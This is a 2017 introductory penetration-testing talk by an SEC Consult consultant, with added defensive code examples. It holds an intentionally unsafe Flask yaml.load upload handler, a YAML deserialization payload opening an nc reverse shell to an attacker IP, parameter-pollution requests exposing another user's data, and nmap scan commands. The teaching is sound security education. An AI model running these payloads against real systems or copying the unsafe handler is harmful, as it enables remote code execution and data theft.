Pentest 101 @ Mahanakorn Network Research Laboratory
Pichaya Morimoto
Free event from Mahanakorn University of Technology (MUT) June 19, 2017
1.
Pentest 101
Version: 1.0 | Date: 2017-06-17 | Author: P. Morimoto | Responsible: P. Morimoto | Confidentiality Class: Public
2.
© 2013 SEC Consult Unternehmensberatung GmbH. All rights reserved. Title: Pentest 101 | Responsible: P. Morimoto | Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public
SEC Consult – Who we are
• Founded in 2002
• 70+ security experts
• 400+ security audits per year
• Globally operating SEC Consult Vulnerability Lab
SEC Consult Offices: Vienna (HQ) | AT, Wiener Neustadt | AT, Linz | AT, Vilnius | LT, Berlin | DE, Montreal | CA, Singapore | SG, Moscow | RU, Zurich | CH, Bangkok | TH, Malaysia | MY, Luxembourg | LU
SEC Consult Clients
3.
SEC Consult – Who we are
• Advisor for information security
• Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB)
• Leading company for technical security audits
• Specialist for web application security according to ONR 17700
• Independent of product manufacturers
• Our customers are public authorities, financial institutions and insurance companies in Central Europe
• Sectoral orientation (defence, public, finance, industry)
4.
ISO/IEC 27001 Certificate
• Entire company within certification scope
• Certified since 16.01.2008
5.
SEC Consult Vulnerability Lab
• Europe's leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories)
• Integral part of the education and further training of the security experts at SEC Consult
• Early information for our customers through SEC Consult security alerts
• Support of well-known manufacturers to enhance the security of their products
Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html
6.
Who am I? (Professional)
Pichaya Morimoto, IT Security Consultant
Certifications:
• Offensive Security Certified Professional (OSCP)
• GIAC Web Application Penetration Tester (GWAPT)
• Certified Ethical Hacker (CEH)
• CompTIA Security+
Published Security Advisories:
• 2014
  - Privilege Escalation in Snort pfSense Package
  - WordPress TimThumb 2.8.13 WebShot RCE
  - HybridAuth install.php PHP RCE
• 2015
  - PHP MoAdmin 1.1.2 RCE
  - Schedule Facebook Posts 1.5.6 SQL Injection
  - LimeSurvey Multiple Critical Vulnerabilities
• 2016
  - Yeager CMS Multiple Critical Vulnerabilities
  - ASUS DSL-N55U router Multiple Vulnerabilities
  - LINE platform Multiple Vulnerabilities
• 2017
  - Aruba AirWave 8.2.3 External Entity Injection
7.
Who am I? (Personal)
• Co-administrator of สอนแฮกเว็บแบบแมว ๆ
• *Former* CTF player of Pwnladin Team
• Co-administrator of 2600 Thailand
• Security addict
http://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html
8.
Who am I? (Personal)
• OWASP Thailand Meeting 3/2014, topic: SQL Injection 101: It is not just about ' or '1'='1
• OWASP Thailand Meeting 5/2015, topic: SQLi + Secure Coding with Hands-on
• OWASP Thailand Meeting 7/2016, topic: Security Misconfiguration
• OWASP Thailand Meeting 2/2017, topic: OWASP Top Ten Proactive Controls 2016
• ...
9.
Who am I? (Personal)
• Bug bounty hunter
• Occasionally, kill bugs for free
Metasploit modules:
• exploit/multi/http/phpmoadmin_exec
• exploit/unix/webapp/hybridauth_install_php_exec
• auxiliary/admin/http/limesurvey_file_download
and a lot more private exploit research and development : )
10.
Who am I? (Personal)
Special Contributor in LINE Security Bug Bounty Program
• https://bugbounty.linecorp.com/en/halloffame/ (2017)
• https://bugbounty.linecorp.com/en/halloffame/2016/ (2016)
11.
Today's Objective
1. Introduction to Penetration Testing
  • What is Penetration Testing?
  • Importance of Penetration Testing
  • Risk, Vulnerability and Exploit
2. Understand the difference between types of security testing
  • Vulnerability Assessment (VA)
  • Penetration Testing
  • Blackbox, whitebox and greybox
3. A quick glance at Penetration Testing methodologies
  • Public guidelines
  • Major activities in Penetration Testing phases
    - Pre-engagement
    - Engagement
    - Post-engagement
4. Basic steps for attacking a target system
  • Case studies
12.
Notice
The information provided in this presentation is collected from publicly available websites and online documents. SEC Consult has an improved version of these methodologies, but it cannot be presented here due to the confidentiality of our business.
13.
What is Penetration Testing? (also called Pentest)
Penetration Testing: "an authorized simulated attack on a computer system that looks for security weaknesses, potentially gaining access to the system's features and data."
https://en.wikipedia.org/wiki/Penetration_test
Goal: to increase the security of the system (network, application) being tested.
14.
Attack on a Computer System!
Gain access to restricted resources
• Unauthorized access to restricted data
• Cross-tenant data access between users
• From application user to administrator
• From application user to local OS user/administrator
• Break into hosts in an internal network
Identify security misconfigurations and insecure implementation
• Insecure configuration of system services and applications
• Bypass security constraints (login, OTP, access control, payment etc.)
• Missing security patches
Privacy
You need to think like the bad guys.
15.
OWASP Top 10 (WebApp)
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project (Release Candidate)
16.
Pentest a Website: The Outcome
Sample list of vulnerabilities:
• SQL injection
• Broken access control
• Bypass OTP verification
• User denial of service
• Improper use of encryption
• Stored cross-site scripting
• XML external entity injection
• Upload of arbitrary files
• Remote code execution
17.
Vulnerability in Standard Software
http://www.securityweek.com/aruba-patches-vulnerabilities-airwave-product
• Found during an internal audit
• Managed to read credentials of all APs
• Notified the vendor to fix the security flaw
• Helps protect thousands of users from cyber attacks
18.
Risk, Vulnerability and Exploit
Risk
Vulnerability
• SQL injection, cross-site scripting ...
• Missing function level access control
• Insufficient network segmentation
Exploit
An attempt to verify the risk by attacking the identified vulnerability
https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology
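The OWASP Risk Rating Methodology linked on this slide, worked through as an added example (not code from the slides or from SEC Consult): the factor names and the severity matrix are OWASP's, while the two sets of factor values are constructed for illustration and rate the slide's SQL injection example before and after a fix.

```python
"""
OWASP Risk Rating worked example (added illustration, not from the slides).

OWASP rates a finding as Risk = Likelihood x Impact. Each side is the average
of eight factors rated 0-9, bucketed as LOW (<3), MEDIUM (3 to <6) or
HIGH (6-9), and the two buckets are combined through a fixed 3x3 matrix into
an overall severity. All factor values below are constructed for illustration.
"""
from statistics import mean

LIKELIHOOD_FACTORS = (
    # threat agent factors
    "skill_level", "motive", "opportunity", "size",
    # vulnerability factors
    "ease_of_discovery", "ease_of_exploit", "awareness", "intrusion_detection",
)
IMPACT_FACTORS = (
    # technical impact factors
    "loss_of_confidentiality", "loss_of_integrity",
    "loss_of_availability", "loss_of_accountability",
    # business impact factors
    "financial_damage", "reputation_damage", "non_compliance", "privacy_violation",
)

# OWASP overall severity matrix, indexed SEVERITY[impact][likelihood]
SEVERITY = {
    "LOW":    {"LOW": "Note",   "MEDIUM": "Low",    "HIGH": "Medium"},
    "MEDIUM": {"LOW": "Low",    "MEDIUM": "Medium", "HIGH": "High"},
    "HIGH":   {"LOW": "Medium", "MEDIUM": "High",   "HIGH": "Critical"},
}


def level(score):
    """Map a 0-9 average to the OWASP LOW / MEDIUM / HIGH bucket."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def average(factors, expected):
    """Average one side's eight factors; reject missing or out-of-range values."""
    missing = set(expected) - set(factors)
    if missing:
        raise ValueError(f"missing factors: {sorted(missing)}")
    values = [factors[name] for name in expected]
    if any(not 0 <= v <= 9 for v in values):
        raise ValueError("each factor must be rated 0-9")
    return mean(values)


def rate_risk(likelihood, impact):
    """Return (likelihood score, impact score, overall severity) per OWASP."""
    l_score = average(likelihood, LIKELIHOOD_FACTORS)
    i_score = average(impact, IMPACT_FACTORS)
    return l_score, i_score, SEVERITY[level(i_score)][level(l_score)]


# Constructed sample: an unauthenticated SQL injection in an internet-facing
# login form (the "Vulnerability" example on the slide), as a tester might rate it.
SQLI_LIKELIHOOD = {
    "skill_level": 6, "motive": 9, "opportunity": 9, "size": 9,
    "ease_of_discovery": 7, "ease_of_exploit": 9, "awareness": 9,
    "intrusion_detection": 8,   # OWASP: 8 = logged without review
}
SQLI_IMPACT = {
    "loss_of_confidentiality": 7, "loss_of_integrity": 7,
    "loss_of_availability": 5, "loss_of_accountability": 7,
    "financial_damage": 7, "reputation_damage": 5,
    "non_compliance": 7, "privacy_violation": 7,
}

# Constructed sample: the same flaw after parameterised queries are deployed and
# only a hard-to-reach internal test instance still carries the old code.
PATCHED_LIKELIHOOD = {
    "skill_level": 1, "motive": 1, "opportunity": 0, "size": 2,
    "ease_of_discovery": 1, "ease_of_exploit": 1, "awareness": 1,
    "intrusion_detection": 1,
}

if __name__ == "__main__":
    for name, lk in (("before fix", SQLI_LIKELIHOOD), ("after fix", PATCHED_LIKELIHOOD)):
        l, i, sev = rate_risk(lk, SQLI_IMPACT)
        print(f"{name}: likelihood={l:.2f} impact={i:.2f} -> {sev}")
```

The impact side does not change with the fix; only the likelihood drops, which is why the residual rating stays at Medium rather than falling to Note.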
19.
Sample Exploit Code
<< EternalBlue exploit
Blind SQL injection exploit >>
20.
Importance of Penetration Testing
• Identify vulnerabilities and security misconfigurations
• Measure the effectiveness of the existing security controls
• Identify gaps in compliance (ISO 27001, PCI DSS etc.)
• A requirement from customer, partner or company's HQ
PCI DSS v3.2, Requirement 11.3
• Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in organization's environment
• Requirement 11.3.2: Conduct internal penetration testing at least annually or after any significant change has occurred in organization's environment
• Requirement 11.3.3: Exploitable vulnerabilities identified during testing shall be corrected and testing shall be repeated to verify corrections
• Requirement 11.3.4: Perform network segmentation testing to validate if segmentation controls and methods are effective and operational
21. Who should conduct a Pentest for your system?
Someone within the company that uses the system
• IT support, network / system engineer
• Programmer, software tester
Hire an IT security specialist into the company
• Security engineer
• Penetration tester
External security consultant firms
• Penetration tester
• SEC Consult (。◕‿◕。)
PCI DSS Penetration Testing Guidance: Qualified internal resources or a qualified third party may perform the penetration test as long as they are organizationally independent. This means the penetration tester must be organizationally separate from the management of the target systems.
22. My Experience on Security Certificates
23. Checkpoint #1
✓ What is Penetration Testing? (also called Pentest)
✓ Attack on a Computer System!
✓ OWASP Top 10 (WebApp)
✓ Pentest a Website: The Outcome
✓ Vulnerability in Standard Software
✓ Risk, Vulnerability and Exploit
✓ Sample Exploit Code
✓ Importance of Penetration Testing
✓ Who should conduct a Pentest for your system?
✓ My Experience on Security Certificates
24. I want a Pentest
https://twitter.com/coffeetocode/status/794593057282859008
25. Vulnerability Assessment (VA)
Network VA scanners
• Nexpose
• Nessus
• Qualys
WebApp VA scanners
• Acunetix
• IBM AppScan
• HP WebInspect
26. Types of Penetration Testing
Blackbox Pentest
• IP addresses in the scope
Greybox Pentest
• App user, VPN user
• User manual
Whitebox Pentest
• Source code
• SSH and/or RDP access
• Network diagram
• Detailed documents
27. Blackbox Pentest in Action
Hack Me Please.
28. Methodologies and Standards
• OWASP Testing Guide ***
• Open Source Security Testing Methodology Manual (OSSTMM)
• Penetration Testing Execution Standard (PTES)
• PCI DSS Penetration Testing Guidance ***
• NIST Guideline on Network Security Testing (Special Publication 800-42)
• NIST SP 800-115: Technical Guide to Information Security Testing and Assessment
• OWASP Top Ten (Web App / Mobile App) ***
• CWE/SANS Top 25 Most Dangerous Software Errors ***
• Durchfuehrungskonzept fuer Penetrationstests (BSI, Germany)
• ÖNORM A 7700 (standard for web application security in Austria)
29. Checkpoint #2
✓ I want a Pentest
✓ Vulnerability Assessment (VA)
✓ Types of Penetration Testing
✓ Blackbox Pentest in Action
✓ Methodologies and Standards
30. Activities in a Penetration Testing Project
1) Pre-engagement
• Schedule
• Scoping
• Rules of engagement
• Formal permission
• Contact points
2) Engagement
• Penetration Testing
3) Post-engagement
• Reporting
• Remediation
• Retesting identified vulnerabilities
• Cleaning up the environment
31. Pre-engagement: The Boring Stuff
Scoping
• Success criteria
• Target systems
• Documentation
• User credentials
• Network diagram
• Formal permission to attack
• Vulnerabilities identified in the past
Rules of engagement
• Schedule, time window
• Method of communication
• Contact points
• Disable IPS, WAF?
• How to handle sensitive data?
• Systems that may have issues with security scanners?
• List of all IP addresses from which testing will originate?
32. Engagement: The Five Phases of Hacking
1. Reconnaissance
• Passive information gathering
2. Scanning
• Active information gathering
• Host discovery
• Port scan
• VA scan
3. Gaining Access
• Exploit the vulnerability
4. Maintaining Access
5. Covering Tracks
33. Engagement: Reconnaissance (Passive)
Passive information gathering:
• The information obtained from the customer
• Open source intelligence (OSINT)
• Company websites
• Search engines (Google, Bing)
• Social media (Facebook, Twitter, LinkedIn)
• Qualifications requested on recruitment sites (jobsdb)
• Software vendor
• Web footer, HTML comments, credits in CSS/JS files
• Metadata from publicly available files
• DOC, XLT, PDF, JPG
• Email, email headers
• Physical locations, list of employees
• The customer in the news
34. Engagement: Reconnaissance (Passive)
(screenshot slide)
35. Engagement: Reconnaissance (Passive)
(screenshot slide)
36. Engagement: Scanning (Active)
Automated tools or manual:
• Interact with the system
• Host discovery (nmap)
• Port scan (nmap)
• Network sniffing (Wireshark)
• Social engineering (phone call, phishing email)
• Vulnerability scan (Nessus, Nexpose)
On-site information gathering:
• Physical security inspections
• Wireless scanning
• Accessible facilities
• Dumpster diving
• Types of equipment in use
37. Engagement: Scanning (Active)
    $ sudo nmap 192.168.99.101
    $ sudo nmap -Pn -n -p 1-65535 192.168.99.101 --open -sV -O
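The second nmap command above produces a service inventory; what the report then needs is the comparison of that inventory against what the customer approved (and, on the post-engagement retest, against the previous run). The following is an added example, not code from the slides, that parses the XML nmap writes with its -oX option and lists the open ports missing from an approved baseline. The XML below is a constructed sample in nmap's XML layout, not a capture of the 192.168.99.101 host on the slide, and the baseline is made up.

```python
"""Open-port inventory from nmap -oX output, diffed against a baseline (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample in the nmap XML layout (nmap -sV -oX -); not a real capture.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -n -p 1-65535 --open -sV -oX - 192.168.99.101">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.168.99.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.2p2"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.18"/></port>
      <port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.18"/></port>
      <port protocol="tcp" portid="8080"><state state="closed" reason="reset"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed baseline: the (protocol, port) pairs approved to be reachable per host.
BASELINE = {"192.168.99.101": {("tcp", 22), ("tcp", 80)}}


def parse_open_ports(xml_text):
    """Return {ip: [port records]} containing only ports nmap reported as open."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        records = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            records.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        inventory[addr.get("addr")] = records
    return inventory


def unexpected_ports(inventory, baseline):
    """Per host, the open (proto, port) pairs that are not in the approved baseline."""
    return {
        ip: sorted((r["proto"], r["port"]) for r in records
                   if (r["proto"], r["port"]) not in baseline.get(ip, set()))
        for ip, records in inventory.items()
    }


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_NMAP_XML)
    for ip, records in found.items():
        for r in records:
            print(f"{ip} {r['proto']}/{r['port']} {r['service']} {r['product']} {r['version']}")
    print("not in baseline:", unexpected_ports(found, BASELINE))
```

In the sample the database port 3306/tcp is open but not approved, which is exactly the kind of finding the "lack of network segmentation" bullet later in the deck refers to; running the same diff on the retest output shows whether remediation actually closed it.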
38. Engagement: Scanning (Active)
(screenshot slide)
39. Engagement: Scanning (Active)
(screenshot slide)
40. Checkpoint #3
✓ Activities in a Penetration Testing Project
✓ Pre-engagement: The Boring Stuff
✓ Engagement: The Five Phases of Hacking
✓ Engagement: Reconnaissance (Passive)
  ✓ Google
  ✓ Shodan
✓ Engagement: Scanning (Active)
  ✓ Nmap
  ✓ Nessus
[… To be continued …]
• Engagement: Gaining Access
• Post-engagement: …
41. Engagement: Gaining Access (Sample Vulnerabilities)
Attack the application layer
• SQL injection
• Insecure data storage
• Broken authentication
• Broken session management
Attack the network layer
• Lack of network segmentation
• Missing ARP spoofing detection
• Missing SYN flood attack detection
• Weak wireless encryption
42. Engagement: Exploitation
Check all the open ports (UDP/TCP)
43. Engagement: Exploitation (OWASP Testing Guide)
Google: "OWASP Testing Guide"
44. Engagement: Post-exploitation
• Privilege escalation
• Pivoting
https://www.exploit-db.com/exploits/39719/
45. Post-engagement: The Boring Stuff #2
• Reporting
• Remediation
• Retesting identified vulnerabilities
• Cleaning up the environment
46. Post-engagement: Reporting Guideline
• Executive Summary
  • Brief high-level summary of the penetration test scope and major findings
• Statement of Scope
• Statement of Methodology
• Statement of Limitations
• Testing Narrative
  • Document any issues encountered during testing
• Segmentation Test Results
• Findings
  • Risk ranking/severity of each vulnerability
  • Description of the finding
• Tools Used
• Cleaning up the Environment Post-penetration Test
  • Provide directions on how the clean-up should be performed
Source: PCI DSS Penetration Testing Guidance
47. Engagement: Case Study #1
48. Engagement: Case Study #1
    from flask import Flask, flash, redirect, request
    import yaml

    app = Flask(__name__)

    @app.route('/', methods=['GET', 'POST'])
    def upload_file():
        if request.method == 'POST':
            if 'file' not in request.files:
                flash('No file part')
                return redirect(request.url)
            file = request.files['file']
            raw_content = file.read()
            # Unsafe on purpose (the bug of this case study): yaml.load() on an
            # uploaded file; with PyYAML before 5.1 this uses the full Loader.
            content = yaml.load(raw_content)
            return yaml.dump(content)
        return 'POST a file to parse it'
(highlighted on the slide: yaml.load())
49. Engagement: Case Study #1
https://stackoverflow.com/questions/1773805/how-can-i-parse-a-yaml-file-in-python
(screenshot with callouts 1 and 2)
50. Engagement: Case Study #1
(screenshot slide)
51. Engagement: Case Study #1
File: Exploit.yml
    some_option: !!python/object/apply:subprocess.call
      args: [nc 192.168.213.170 1234 -e /bin/bash]
      kwds: {shell: true}
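Slides 48 and 51 show the vulnerable handler and the YAML document that abuses it: the full PyYAML loader honours `!!python/object/apply:` tags, so it will call an arbitrary callable while "parsing". The fix is to parse uploads with `yaml.safe_load`, which only constructs the core YAML types and raises on any other tag. The following is an added example, not code from the slides; it assumes PyYAML is installed, the documents are constructed, and the tagged one points at the harmless `os.getcwd` only to show that the tag itself is refused before anything is called.

```python
"""Safe parsing of an untrusted YAML upload (added example for Case Study #1)."""
import yaml  # PyYAML; assumed to be installed

MAX_UPLOAD_BYTES = 64 * 1024  # assumed limit for an uploaded configuration file


class RejectedUpload(ValueError):
    """Raised when an uploaded document must not be processed further."""


def parse_untrusted_yaml(raw: bytes) -> dict:
    """Parse attacker-controlled YAML into plain Python types or raise RejectedUpload."""
    if len(raw) > MAX_UPLOAD_BYTES:
        raise RejectedUpload("document too large")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise RejectedUpload("document is not UTF-8") from exc
    try:
        # safe_load knows only str/int/float/bool/None/list/dict; a !!python/... tag
        # makes it raise ConstructorError (a YAMLError) instead of building an object.
        document = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise RejectedUpload(f"rejected: {type(exc).__name__}") from exc
    if document is None:          # empty file parses to None
        document = {}
    if not isinstance(document, dict):
        raise RejectedUpload("top-level value must be a mapping")
    return document


def is_accepted(raw: bytes) -> bool:
    """True when the upload parses cleanly under the rules above."""
    try:
        parse_untrusted_yaml(raw)
        return True
    except RejectedUpload:
        return False


# Constructed sample documents.
BENIGN = b"some_option: 42\nname: demo\n"
TAGGED = b"some_option: !!python/object/apply:os.getcwd\n"  # harmless callable, still refused
LIST_TOP = b"- just a list\n"

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("tagged", TAGGED), ("list", LIST_TOP)):
        print(label, "accepted" if is_accepted(doc) else "rejected")
```

In the handler on slide 48 the two lines `content = yaml.load(raw_content)` and `return yaml.dump(content)` become `content = parse_untrusted_yaml(raw_content)` and `return yaml.safe_dump(content)`, and the RejectedUpload error is turned into a 400 response; the size cap and the mapping check are defence in depth against oversized or unexpected documents, the loader choice is what removes the code execution.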
52. Engagement: Case Study #2
(architecture diagram) 3rd party Mobile App → Internet → 3rd party Dispatcher Server and 3rd party DB/Auth Server → Isolated Network → Critical Systems
53. Engagement: Case Study #2
3rd party Mobile App → Internet → 3rd party Dispatcher Server (with 3rd party DB/Auth Server) → Isolated Network → Critical Systems
Request from the Mobile App to the 3rd party:
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>
Request forwarded by the Dispatcher Server to the customer:
    POST /userInfo
    Host: customer
    userId=1234
Result: data for the authorized user (1234)
54. Engagement: Case Study #2
3rd party Mobile App → Internet → 3rd party Dispatcher Server (with 3rd party DB/Auth Server) → Isolated Network → Critical Systems
Request from the Mobile App to the 3rd party:
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>&aaa=bbb
Request forwarded by the Dispatcher Server to the customer:
    POST /userInfo
    Host: customer
    userId=1234&aaa=bbb
Result: data for the authorized user (1234)
55. Engagement: Case Study #2
3rd party Mobile App → Internet → 3rd party Dispatcher Server (with 3rd party DB/Auth Server) → Isolated Network → Critical Systems
Request from the Mobile App to the 3rd party:
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>&userId=1235
Request forwarded by the Dispatcher Server to the customer:
    POST /userInfo
    Host: customer
    userId=1234&userId=1235
Result: data for the authorized user (1235)
56. Engagement: Case Study #2
https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)
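Slides 53 to 55 show the two halves of the HTTP parameter pollution bug: the dispatcher copies the client's parameters verbatim onto the request it sends into the isolated network, and the customer's backend resolves a repeated `userId` to the last value. The following is an added example, not code from the slides or from the third party, that models both halves with the standard library so the failure and its two fixes can be checked side by side. The token table and request bodies are constructed; the real dispatcher's token lookup against its DB/Auth server is replaced by a dictionary.

```python
"""Case Study #2 modelled: parameter pollution through a forwarding dispatcher (added example)."""
from urllib.parse import parse_qs, parse_qsl, urlencode

# Constructed: token -> user id, standing in for the 3rd party DB/Auth server lookup.
TOKEN_TABLE = {"tok-for-1234": "1234"}
# Parameters that only the dispatcher is allowed to set on the forwarded request.
DISPATCHER_OWNED = {"userId"}


def _resolve_user(pairs):
    """Map the client's token to the user it authenticates, or refuse."""
    token = next((v for k, v in pairs if k == "token"), None)
    user_id = TOKEN_TABLE.get(token)
    if user_id is None:
        raise PermissionError("unknown or missing token")
    return user_id


def dispatcher_forward_vulnerable(client_body):
    """As on slide 55: replace token with userId, pass every other client pair through."""
    pairs = parse_qsl(client_body, keep_blank_values=True)
    user_id = _resolve_user(pairs)
    forwarded = [("userId", user_id)] + [(k, v) for k, v in pairs if k != "token"]
    return urlencode(forwarded)


def dispatcher_forward_hardened(client_body):
    """Drop any client-supplied parameter the dispatcher itself is authoritative for."""
    pairs = parse_qsl(client_body, keep_blank_values=True)
    user_id = _resolve_user(pairs)
    forwarded = [("userId", user_id)] + [
        (k, v) for k, v in pairs if k != "token" and k not in DISPATCHER_OWNED]
    return urlencode(forwarded)


def duplicated_parameters(body):
    """Names that occur more than once: the cheap HPP indicator a backend or WAF can check."""
    return sorted(k for k, v in parse_qs(body, keep_blank_values=True).items() if len(v) > 1)


def backend_vulnerable(forwarded_body):
    """The customer backend in the case study: a repeated parameter resolves to its last value."""
    return parse_qs(forwarded_body, keep_blank_values=True)["userId"][-1]


def backend_hardened(forwarded_body):
    """Refuse ambiguous requests instead of picking one of the repeated values."""
    if "userId" in duplicated_parameters(forwarded_body):
        raise ValueError("userId supplied more than once")
    values = parse_qs(forwarded_body, keep_blank_values=True).get("userId", [])
    if len(values) != 1:
        raise ValueError("userId missing")
    return values[0]


def served_user(dispatcher, backend, client_body):
    """Which user's data the isolated system would return for a given client request."""
    return backend(dispatcher(client_body))


if __name__ == "__main__":
    polluted = "token=tok-for-1234&userId=1235"
    print("vulnerable chain serves:", served_user(dispatcher_forward_vulnerable, backend_vulnerable, polluted))
    print("hardened dispatcher serves:", served_user(dispatcher_forward_hardened, backend_vulnerable, polluted))
```

Either fix alone closes this particular path (the hardened dispatcher never forwards a second `userId`; the hardened backend refuses the ambiguity), but they belong on both sides: the customer does not control the third party's code, and the dispatcher cannot know how every backend behind it resolves duplicates, which is the point the linked OWASP test page makes.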
57. How to become a Penetration Tester?
My Path:
- Join security communities in Thailand (2600 Thailand, OWASP Thailand Chapter, TISA, CITEC)
- Practice, practice, and practice!
- Share what you learn!
- Join the hacking competitions and Capture the Flag games
58. How to become a Penetration Tester?
https://goo.gl/8cLyPY
59. Find security consultant firms in Thailand
https://goo.gl/N9DkGM
60. Contact
GERMANY: SEC Consult Unternehmensberatung Deutschland GmbH, Bockenheimer Landstraße 17-19, 60325 Frankfurt / Main, Tel +49 69 175 373 43 | Fax +49 69 175 373 44, Email office-frankfurt@sec-consult.com
AUSTRIA: SEC Consult Unternehmensberatung GmbH, Mooslackengasse 17, 1190 Vienna, Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15, Email office@sec-consult.com
LITHUANIA: UAB Critical Security, a SEC Consult company, Sauletekio al. 15-311, 10224 Vilnius, Tel +370 5 2195535, Email office-vilnius@sec-consult.com
RUSSIA: CJCS Security Monitor, 5th Donskoy proyezd, 15, Bldg. 6, 119334 Moscow, Tel +7 495 662 1414, Email info@securitymonitor.ru
SINGAPORE: SEC Consult Singapore PTE. LTD, 4 Battery Road #25-01, Bank of China Building, Singapore (049908), Email office-singapore@sec-consult.com
CANADA: i-SEC Consult Inc., 100 René-Lévesque West, Suite 2500, Montréal (Quebec) H3B 5C9, Email office-montreal@sec-consult.com
AUSTRIA: SEC Consult Unternehmensberatung GmbH, Komarigasse 14/1, 2700 Wiener Neustadt, Tel +43 1 890 30 43 0, Email office@sec-consult.com
THAILAND: SEC Consult (Thailand) Co.,Ltd., 29/1 Piyaplace Langsuan Building, 16th Floor, 16B Soi Langsuan, Ploen Chit Road, Lumpini, Patumwan, Bangkok 10330, Email office-vilnius@sec-consult.com
www.sec-consult.com